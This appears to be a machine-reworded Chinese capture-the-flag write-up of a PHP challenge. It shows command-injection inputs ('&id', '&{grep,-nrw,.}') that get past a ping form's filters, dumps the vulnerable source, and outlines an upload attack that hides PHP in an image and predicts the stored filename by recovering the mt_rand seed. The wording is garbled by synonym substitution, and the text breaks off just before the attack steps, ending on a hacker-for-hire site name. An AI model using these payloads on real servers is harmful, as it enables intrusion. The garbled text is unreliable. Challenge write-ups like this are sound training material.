榜首眼看这个应战，通常是过滤一些字符或许添加一些约束来阻挠指令履行，我经过输入&id到addr域，成功回来履行成果，能够确认这是一道指令履行的应战题。

下一步咱们来找出过滤和约束。经过测验，咱们发现不能够输入空格，/，而且只能输入15个字符。
运转find和set指令，咱们能够发现一些信息。
Result of the command find:
.
./index.php
./pages
./pages/ping.php
./pages/Adm1n1sTraTi0n2.php
./files
find: `./files': Permission denied
咱们看到，/pages文件夹下有一些.php文件，/files文件夹，咱们没有权限拜访，还有一个比较风趣的文件叫Adm1n1sTraTi0n2.php

翻开后是一个上传页面，上传图片后，会回来相似file image.png?www.tiechemo.com指令回来的信息，可是咱们不知道上传后的文件保存途径，现在的思路是，只能经过前面的指令履行缝隙来读取php源码，由于过滤了空格和/，所以咱们运用grep来递归读文件，我这儿运用的是&{grep,-nrw,.}
index.php
---------
3magic
 
    '?page=ping'>ping
 
 
    if ($_SERVER['REMOTE_ADDR'] == '127.0.0.1') {
  ?>
     
      '?page=Adm1n1sTraTi0n2'>admin
     
 
    }
  ?>
 
 
  if (isset($_GET['page'])) {
    $p = $_GET['page'];
    if (preg_match('/(://)/', $p)) {
      die('attack detected');
    }
    include("pages/".$p.".php");
    die();
  }
  ?>
ping.php
--------
ping
"./?page=ping" method="POST">
  "text" name="addr" placeholder="addr">
  "submit" value="send">
 
"width: 300px; height: 300px" placeholder="result">
if (isset($_POST['addr'])) {
  $addr = $_POST['addr'];
  if (preg_match('/[`;$()| /'>"t]/', $addr)) {
    die("invalid character detected");
  }
  if (strpos($addr, ".php") !== false){
    die("invalid character detected");
  }
  if (strlen($addr) > 15) {
    die("addr is too long");
  }
  @system("timeout 2 bash -c 'ping -c 1 $addr' 2>&1");
}
?>
Adm1n1sTraTi0n2.php
-------------------
image inspector
mt_srand((time() % rand(1,10000) + rand(2000,5000))%rand(1000,9000)+rand(2000,5000));
// files directory flushed every 3min
setcookie('test', mt_rand(), time(), '/');
if (isset($_POST['submit'])) {
  $check = getimagesize($_FILES['file']['tmp_name']);
  if($check !== false) {
    echo 'File is an image - ' . $check['mime'];
    $filename = '/var/www/html/3magic/files/'.mt_rand().'_'.$_FILES['file']['name']; // prevent path traversal
    move_uploaded_file($_FILES['file']['tmp_name'], $filename);
    echo "
n";
    system('/usr/bin/file -b '.escapeshellarg($filename));
    echo "
n";
  } else {
    echo "File is not an image";
  }
}
?>
"?page=Adm1n1sTraTi0n2" method="post" enctype="multipart/form-data">
  Select image to upload:
  "file" name="file">
  "submit" value="Upload Image" name="submit">
index.php:
经过源码能够看出这个文件的page参数有LFI缝隙，可是不能够进一步运用，由于服务器装置的PHP版别，现已修补了%00切断缝隙
图画验证仅仅经过getsizeimage()函数验证了图画巨细，上传的文件名经过文件名+随机数生成
当拜访页面的时分，会经过mt_srand()生成随机数种子，随后会用mt_rand()生成随机数在cookie里，最终结合上传后的文件名，存放到/files目录中
mt_rand()已知的是有缝隙的，咱们能从恣意mt_rand()值中康复种子，假如想了解细节，能够参阅这篇文章http://www.openwall.com/php_mt_seed/README，也能够下载运用东西http://download.openwall.net/pub/projects/php_mt_seed/php_mt_seed-3.2.tar.gz
现在进犯思路清晰了，咱们首要上传一个.php文件，其实就是在一个图片文件的结尾加上，以便绕过getsizeimage()函数。然后在cookie中test字段找到mt_rand()生成的值，运用php_mt_seed东西康复种子，最终再运用mt_rand()结合上传的文件名，拜访/files下的文件。
详细进犯流程如下：

[1] [2]  黑客接单网